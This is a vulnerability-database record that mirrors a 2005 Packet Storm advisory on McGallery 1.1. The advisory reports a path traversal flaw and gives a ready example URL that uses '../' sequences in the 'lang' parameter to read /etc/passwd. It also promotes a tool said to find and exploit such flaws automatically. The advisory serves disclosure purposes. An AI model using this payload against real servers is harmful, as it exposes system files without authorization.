{"id": "PACKETSTORM:38178", "type": "packetstorm", "bulletinFamily": "exploit", "title": "phpforum11.txt", "description": "", "published": "2005-06-21T00:00:00", "modified": "2005-06-21T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/38178/phpforum11.txt.html", "reporter": "d_bug", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:29:31", "viewCount": 1, "enchantments": {"score": {"value": -0.4, "vector": "NONE", "modified": "2016-11-03T10:29:31", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:29:31", "rev": 2}, "vulnersScore": -0.4}, "sourceHref": "https://packetstormsecurity.com/files/download/38178/phpforum11.txt", "sourceData": "`Vendor: Phpforum, http://www.phpforums.net/ \nProduct: McGallery v 1.1 \n \nVulnerability: files reading on disk \nConsequences: Web server paths are opened \nRisk: High \n \nDescription: Attacker can form the query in URL form ang get the access to the system files \nExample: thttp://example.com/mcgallery/admin.php?lang=../../../../../../etc/passwd \n \nDiscoveried By D_BuG d_bug@bk.ru \nNemesisSecurityTeam \nhttp://nemesisoftware.com/ \n \nCheckZond free v. 1.0 http://nemesisoftware.com/products.htm \nuses the vulnerabilities above for automatic vulnerabilities search (Google Hacking technique) and usage. \n \n-- \nBest regards, \nD_BuG mailto:d_bug@bk.ru \n \n`\n", "immutableFields": []}

{}